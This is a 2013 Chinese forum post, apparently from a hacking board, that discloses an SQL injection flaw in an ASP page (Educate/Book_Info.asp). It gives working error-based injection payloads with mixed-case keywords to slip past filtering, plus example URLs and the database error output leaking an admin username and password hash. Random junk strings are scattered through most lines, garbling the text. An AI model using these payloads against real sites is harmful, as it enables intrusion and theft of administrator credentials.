漏洞出现在Educate/Book_Info.asp
' u% j1 I% [: l2 e6 I ) t" b- }0 {! A' E- s
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出' r0 a! u* ]1 L1 H2 H* H$ G
' Y; |0 C2 s! Z
exp:如下; m7 _6 O$ `4 v5 l+ f" c
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
; {' \. B, C$ D& }6 i3 r8 ?/ t0 L查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- Z3 {! M( L$ {9 g4 |' n# h" ]
# l0 d. W& ]% }; J+ H6 d" rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)+ R: P# y& {$ E, X4 v9 Z U
( A p* ~* c0 ZMicrosoft OLE DB Provider for SQL Server 错误 '80040e07') d2 c; _7 O6 U) T9 Q+ e* i
/ h; z6 n) J- C; O9 ^0 F$ ~! N- l2 D将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
; V3 g7 j/ q, z7 D1 |5 j* N: F) b
( q$ W3 R# C: ^, g/Educate/Book_Info.asp,行 8
|7 v# y$ c9 b5 e4 C+ u / D: s4 l' L0 T9 ~3 g9 G# ?$ E
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
# k* i/ O) [# W
. A$ P {3 H$ ]0 y% yMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
C6 |. k7 T& V- X0 D- Q' N5 c " h6 P7 r, S$ K2 E
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。1 ]8 N! R7 S/ K) n
0 I, {6 [: M2 Z- j6 Q' i/ B5 S/Educate/Book_Info.asp,行 8
! H5 e% z4 F& J! [6 Q |
发表于 2013-2-16 21:44:16
收藏
支持
反对